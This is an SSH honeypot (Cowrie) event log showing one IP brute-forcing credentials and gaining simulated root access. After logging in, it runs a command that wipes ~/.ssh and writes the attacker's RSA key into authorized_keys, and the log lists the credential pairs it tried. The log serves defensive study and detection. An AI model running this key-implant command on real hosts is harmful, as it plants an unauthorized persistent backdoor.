{"eventid":"cowrie.login.failed","username":"status","password":"status.123","message":"login attempt [status/status.123] failed","sensor":"my-vps","timestamp":"2025-09-09T10:01:58.846795Z","src_ip":"212.227.235.229","session":"e3277f5bb902"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:02:00.465491Z","src_ip":"212.227.235.229","session":"e3277f5bb902"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59716,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4722abdbf9a","protocol":"ssh","message":"New connection: 212.227.235.229:59716 (1.2.3.4:22) [session: c4722abdbf9a]","sensor":"my-vps","timestamp":"2025-09-09T10:02:09.040079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:02:09.041878Z","src_ip":"212.227.235.229","session":"c4722abdbf9a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:02:09.322155Z","src_ip":"212.227.235.229","session":"c4722abdbf9a"}
{"eventid":"cowrie.login.success","username":"root","password":"neveragain","message":"login attempt [root/neveragain] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:02:10.421981Z","src_ip":"212.227.235.229","session":"c4722abdbf9a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:02:11.032434Z","src_ip":"212.227.235.229","session":"c4722abdbf9a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:02:11.034921Z","src_ip":"212.227.235.229","session":"c4722abdbf9a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:02:11.037425Z","src_ip":"212.227.235.229","session":"c4722abdbf9a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:02:11.306875Z","src_ip":"212.227.235.229","session":"c4722abdbf9a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:02:11.844599Z","src_ip":"212.227.235.229","session":"c4722abdbf9a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:02:11.845931Z","src_ip":"212.227.235.229","session":"c4722abdbf9a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:02:12.161959Z","src_ip":"212.227.235.229","session":"c4722abdbf9a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:02:12.241952Z","src_ip":"212.227.235.229","session":"c4722abdbf9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60004,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bbf060f56a4","protocol":"ssh","message":"New connection: 212.227.235.229:60004 (1.2.3.4:22) [session: 2bbf060f56a4]","sensor":"my-vps","timestamp":"2025-09-09T10:02:12.736403Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35540,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc79ff6d0ec4","protocol":"ssh","message":"New connection: 212.227.235.229:35540 (1.2.3.4:22) [session: fc79ff6d0ec4]","sensor":"my-vps","timestamp":"2025-09-09T10:02:12.740765Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:02:12.751040Z","src_ip":"212.227.235.229","session":"2bbf060f56a4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:02:12.751523Z","src_ip":"212.227.235.229","session":"fc79ff6d0ec4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:02:12.851904Z","src_ip":"212.227.235.229","session":"fc79ff6d0ec4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:02:13.027350Z","src_ip":"212.227.235.229","session":"2bbf060f56a4"}
{"eventid":"cowrie.login.success","username":"root","password":"*wk#db$fhq@rp!","message":"login attempt [root/*wk#db$fhq@rp!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:02:13.269352Z","src_ip":"212.227.235.229","session":"fc79ff6d0ec4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:02:13.543669Z","src_ip":"212.227.235.229","session":"fc79ff6d0ec4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:02:13.544650Z","src_ip":"212.227.235.229","session":"fc79ff6d0ec4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:02:13.546085Z","src_ip":"212.227.235.229","session":"fc79ff6d0ec4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:02:13.646288Z","src_ip":"212.227.235.229","session":"fc79ff6d0ec4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:02:13.859398Z","src_ip":"212.227.235.229","session":"fc79ff6d0ec4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:02:13.861845Z","src_ip":"212.227.235.229","session":"fc79ff6d0ec4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:02:13.962636Z","src_ip":"212.227.235.229","session":"fc79ff6d0ec4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:02:13.965357Z","src_ip":"212.227.235.229","session":"fc79ff6d0ec4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35554,"dst_ip":"1.2.3.4","dst_port":22,"session":"a607eb80d566","protocol":"ssh","message":"New connection: 212.227.235.229:35554 (1.2.3.4:22) [session: a607eb80d566]","sensor":"my-vps","timestamp":"2025-09-09T10:02:14.052654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:02:14.055709Z","src_ip":"212.227.235.229","session":"a607eb80d566"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:02:14.092255Z","src_ip":"212.227.235.229","session":"2bbf060f56a4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:02:14.154336Z","src_ip":"212.227.235.229","session":"a607eb80d566"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:02:14.571372Z","src_ip":"212.227.235.229","session":"a607eb80d566"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:02:15.361665Z","src_ip":"212.227.235.229","session":"2bbf060f56a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60006,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1d8efdced93","protocol":"ssh","message":"New connection: 212.227.235.229:60006 (1.2.3.4:22) [session: c1d8efdced93]","sensor":"my-vps","timestamp":"2025-09-09T10:02:15.629861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:02:15.631036Z","src_ip":"212.227.235.229","session":"c1d8efdced93"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:02:15.671414Z","src_ip":"212.227.235.229","session":"a607eb80d566"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35564,"dst_ip":"1.2.3.4","dst_port":22,"session":"411451887ab5","protocol":"ssh","message":"New connection: 212.227.235.229:35564 (1.2.3.4:22) [session: 411451887ab5]","sensor":"my-vps","timestamp":"2025-09-09T10:02:15.783329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:02:15.785002Z","src_ip":"212.227.235.229","session":"411451887ab5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:02:15.884896Z","src_ip":"212.227.235.229","session":"411451887ab5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:02:15.908799Z","src_ip":"212.227.235.229","session":"c1d8efdced93"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:02:16.324865Z","src_ip":"212.227.235.229","session":"411451887ab5"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:02:16.423833Z","src_ip":"212.227.235.229","session":"fc79ff6d0ec4"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:02:16.424884Z","src_ip":"212.227.235.229","session":"411451887ab5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:02:17.034832Z","src_ip":"212.227.235.229","session":"c1d8efdced93"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:02:17.310459Z","src_ip":"212.227.235.229","session":"c4722abdbf9a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:02:17.313951Z","src_ip":"212.227.235.229","session":"c1d8efdced93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41726,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e60080c5fc1","protocol":"ssh","message":"New connection: 212.227.235.229:41726 (1.2.3.4:22) [session: 0e60080c5fc1]","sensor":"my-vps","timestamp":"2025-09-09T10:02:45.128205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:02:45.137317Z","src_ip":"212.227.235.229","session":"0e60080c5fc1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:02:45.404882Z","src_ip":"212.227.235.229","session":"0e60080c5fc1"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"abc123","message":"login attempt [uftp/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T10:02:46.483046Z","src_ip":"212.227.235.229","session":"0e60080c5fc1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:02:47.764054Z","src_ip":"212.227.235.229","session":"0e60080c5fc1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35580,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfd1efd23485","protocol":"ssh","message":"New connection: 212.227.235.229:35580 (1.2.3.4:22) [session: bfd1efd23485]","sensor":"my-vps","timestamp":"2025-09-09T10:03:11.796096Z"}
